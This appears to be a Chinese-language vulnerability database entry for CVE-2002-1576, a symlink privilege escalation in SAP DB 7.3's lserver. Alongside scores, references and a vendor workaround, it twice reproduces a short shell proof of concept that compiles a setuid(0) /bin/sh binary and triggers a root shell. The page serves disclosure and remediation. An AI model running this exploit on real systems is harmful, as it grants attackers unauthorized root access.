CVE-2002-1576
CVSS7.2
发布时间 :2004-04-15 00:00:00
修订时间 :2016-10-17 22:27:16
NMCOES    

[原文]lserver in SAP DB 7.3 and earlier uses the current working directory to find and execute the lserversrv program, which allows local users to gain privileges with a malicious lserversrv that is called from a directory that has a symlink to the lserver program.


[CNNVD]SAP DB本地符号链接漏洞(CNNVD-200404-049)

        
        SAP DB是一款商业性质数据库系统。
        由于'lserver'缺少充分完整性检查,当在本地目录中尝试执行'lserversrv'程序时,本地攻击者可以利用这个漏洞通过符号链接提升权限。
        SAP DB中的'lserver'程序在执行程序时缺少处理,攻击者可以通过在'lserver'目录中建立符号连接,连接到包含恶意代码的'lserversrv'二进制程序,执行'lserver'时可导致当前目录中的恶意'lserversrv'通过符号链接而被执行,一般以root用户权限执行包含在'lserversrv'中的任意命令。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1576
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1576
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200404-049
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=103903565829796&w=2
(UNKNOWN)  BUGTRAQ  20021204 SAP database local root via symlink
http://www.sapdb.org/sap_db_alert.htm
(PATCH)  CONFIRM  http://www.sapdb.org/sap_db_alert.htm
http://www.securityfocus.com/bid/6316
(VENDOR_ADVISORY)  BID  6316
http://xforce.iss.net/xforce/xfdb/10762
(VENDOR_ADVISORY)  XF  sap-db-lserversrv-symlink(10762)

- 漏洞信息

SAP DB本地符号链接漏洞
高危 其他
2004-04-15 00:00:00 2005-10-20 00:00:00
本地  
        
        SAP DB是一款商业性质数据库系统。
        由于'lserver'缺少充分完整性检查,当在本地目录中尝试执行'lserversrv'程序时,本地攻击者可以利用这个漏洞通过符号链接提升权限。
        SAP DB中的'lserver'程序在执行程序时缺少处理,攻击者可以通过在'lserver'目录中建立符号连接,连接到包含恶意代码的'lserversrv'二进制程序,执行'lserver'时可导致当前目录中的恶意'lserversrv'通过符号链接而被执行,一般以root用户权限执行包含在'lserversrv'中的任意命令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * SAP DB供应商提供如下临时解决方法:
        # cd /pgm
        # cp lserversrv lserver
        # chown root lserver
        # chmod +s lserver
        厂商补丁:
        SAP
        ---
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.sap.com/

- 漏洞信息 (22067)

SAP DB 7.3 .00 Symbolic Link Vulnerability (EDBID:22067)
unix local
2002-12-04 Verified
0 SAP Security
N/A [点击下载]
source: http://www.securityfocus.com/bid/6316/info

A vulnerability has been discovered in SAP DB that may allow an unprivileged to execute commands with root privileges. The vulnerability is due to insufficient sanity checks by lserver, when attempting to execute the 'lserversrv' binary in the current directory. 

An attacker can exploit this vulnerability by creating a symbolic link to the 'lserver' binary in a directory containing a maliciously created 'lserversrv' binary. Executing lserver via the symbolic link will cause the malicious 'lserversrv' progam in the current directory to be executed.

cd /tmp
mkdir "snosoft+sapdb=root"
cd "snosoft+sapdb=root"
ln -s /usr/sapdb/depend/pgm/lserver lserver
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > root.c
cc -o root root.c
cp root lserversrv
./lserver		

- 漏洞信息

14554
SAP DB lserver Path Subversion Privilege Escalation

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-12-04 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

SAP DB Symbolic Link Vulnerability
Origin Validation Error 6316
No Yes
2002-12-04 12:00:00 2009-07-11 07:16:00
This vulnerability first detailed in a SAP Security Advisory.

- 受影响的程序版本

SAP DB 7.3 .00

- 漏洞讨论

A vulnerability has been discovered in SAP DB that may allow an unprivileged to execute commands with root privileges. The vulnerability is due to insufficient sanity checks by lserver, when attempting to execute the 'lserversrv' binary in the current directory.

An attacker can exploit this vulnerability by creating a symbolic link to the 'lserver' binary in a directory containing a maliciously created 'lserversrv' binary. Executing lserver via the symbolic link will cause the malicious 'lserversrv' progam in the current directory to be executed.

- 漏洞利用

The following proof of concept was provided by KF

cd /tmp
mkdir "snosoft+sapdb=root"
cd "snosoft+sapdb=root"
ln -s /usr/sapdb/depend/pgm/lserver lserver
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > root.c
cc -o root root.c
cp root lserversrv
./lserver

- 解决方案

The vendor has stated the following:

Perform the following steps for each <dependent_path>

$ cd <dependent_path>/pgm
$ cp lserversrv lserver
$ chown root lserver
$ chmod +s lserver

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站